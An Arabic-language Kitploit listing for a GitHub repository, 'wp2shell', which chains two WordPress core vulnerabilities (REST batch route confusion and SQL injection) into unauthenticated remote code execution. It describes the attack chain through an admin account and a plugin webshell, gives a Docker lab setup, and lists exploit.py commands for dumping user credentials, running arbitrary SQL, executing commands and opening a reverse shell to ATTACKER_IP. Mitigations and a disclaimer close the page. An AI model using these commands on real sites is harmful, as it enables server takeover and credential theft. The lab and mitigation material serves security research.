Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-63030-CVE-2026-60137 | Kitploit
أدوات/GitHubGitHub/giangdurian/cve-2026-63030-cve-2026-60137
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubgiangdurian/cve-2026-63030-cve-2026-60137

CVE-2026-63030-CVE-2026-60137

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 27 أياملم تتم المراجعة بعد

CVE-2026-63030 وCVE-2026-60137 — wp2shell

ثغرة تنفيذ أوامر عن بُعد قبل المصادقة في نواة ووردبريس — التباس المسار + حقن SQL متسلسلان لتنفيذ أوامر عن بُعد

CVECVE-2026-63030 + CVE-2026-60137
الاسم المستعارwp2shell
نوع الثغرةالتباس مسار REST API ← حقن SQL ← تنفيذ أوامر عن بُعد
الخطورةحرجة — CVSS 10.0
الإصدارات المتأثرةWordPress 6.9.0–6.9.4, 7.0.0–7.0.1
أُصلحت فيWordPress 6.8.6, 6.9.5, 7.0.2
المصادقة المطلوبةلا شيء (قبل المصادقة)

نظرة عامة

wp2shell هو الاسم لسلسلة الاستغلال التي تجمع ثغرتين في نواة ووردبريس:

  • CVE-2026-63030 — التباس المسار: نقطة النهاية الدفعية (/wp-json/batch/v1) تعاني من انزياح الفهرس بين المصفوفتين $matches[] و $validation[] عندما يحتوي الطلب الفرعي على مسار خاطئ، مما يجعل الطلب الفرعي التالي يُنفَّذ تحت معالج خاطئ → تجاوز التحقق من مخطط REST API.
  • CVE-2026-60137 — حقن SQL: WP_Query::get_posts() لا يعقّم المعامل author__not_in عندما يستقبله كسلسلة نصية بدلاً من مصفوفة → حقن SQL خام.

تشكّل الثغرتان معًا سلسلة استغلال كامل قبل المصادقة (Pre-Auth RCE) — من صفر بيانات اعتماد إلى شل على الخادم عبر طلب HTTP فقط.

سلسلة الاستغلال

root@kitploit:~
Route Confusion (bypass REST validation)
    → SQL Injection (đọc DB: users, secret keys)
        → oEmbed cache poisoning (read-only SQLi → write primitive)
            → customize_changeset (tạo admin mới)
                → Plugin upload (webshell)
                    → Remote Code Execution

اقرأ التحليل الفني الكامل في REPORT.md


إعداد المختبر

يستخدم المختبر Docker Compose مع 3 حاويات:

المتطلبات

  • Docker + Docker Compose
  • Python 3.8+ (stdlib فقط، لا حاجة لتثبيت حزم إضافية)
  • Bash (لتشغيل setup.sh)

التشغيل

root@kitploit:~
cd wp2shell-lab
bash setup.sh

يقوم السكريبت تلقائيًا:

  1. سحب الصور وتشغيل الحاويات
  2. تثبيت ووردبريس 6.9.4
  3. تعبئة بيانات تجريبية (مقالات، مستخدمون)
  4. تفعيل سجل MySQL العام + WP_DEBUG

عند الاكتمال ستظهر رسالة "WP2Shell Lab — READY!" مع معلومات تسجيل الدخول.

التنظيف

root@kitploit:~
cd wp2shell-lab
docker compose down -v

استخدام الاستغلال

root@kitploit:~
# Kiểm tra vulnerability
python3 exploit.py check http://TARGET:8080

# Kiểm tra + xác nhận SQLi
python3 exploit.py check --confirm-sqli http://TARGET:8080

# Đọc user credentials từ database
python3 exploit.py read --preset users http://TARGET:8080

# Chạy câu SQL tùy ý
python3 exploit.py read --query "SELECT @@version" http://TARGET:8080

# Full RCE — chạy command
python3 exploit.py shell --cmd "id" http://TARGET:8080

# Reverse shell
python3 exploit.py shell --reverse ATTACKER_IP:PORT http://TARGET:8080

تمت إعادة كتابة سكريبت PoC من الصفر، بالاستناد إلى Icex0/wp2shell-poc. يستخدم مكتبة Python 3 القياسية فقط، دون الحاجة لتثبيت أي تبعيات إضافية.


شروط الاستغلال

الشرطالمتطلب
إصدار ووردبريس6.9.0–6.9.4 أو 7.0.0–7.0.1
نقطة نهاية REST API الدفعيةيمكن الوصول إليه (مفعّل افتراضيًا)
المصادقةغير مطلوبة
الشبكةيستطيع المهاجم الوصول إلى ووردبريس

التخفيف

  1. ترقية ووردبريس إلى >= 6.9.5 أو >= 7.0.2 — الطريقة الوحيدة الجذرية.
  2. تعطيل نقطة النهاية الدفعية مؤقتًا: أضف add_filter('rest_batch_disabled', '__return_true'); إلى functions.php.
  3. قاعدة WAF: امنع الطلبات الموجهة إلى /wp-json/batch/v1 التي تحتوي على كلمات SQL المفتاحية.

إخلاء مسؤولية

أُنشئ هذا المستودع لأغراض البحث والتعلم وCTF داخل بيئة مختبر خاضعة للتحكم. لا تستخدمه لمهاجمة أنظمة حقيقية. أي استغلال غير مصرح به يُعد مخالفة قانونية.


المراجع

  • Icex0/wp2shell-poc — PoC الأصلي المرجعي
  • WordPress 6.9.4 — class-wp-rest-server.php
  • WordPress 6.9.4 — class-wp-query.php
  • Patch diff 6.9.4 -> 6.9.5
تنزيل الأداة
الحاوية
الصورة
المنفذ
WordPress (قابل للاستغلال)wordpress:6.9.48080
MySQLmysql:8.0داخلي
phpMyAdminphpmyadmin:latest8081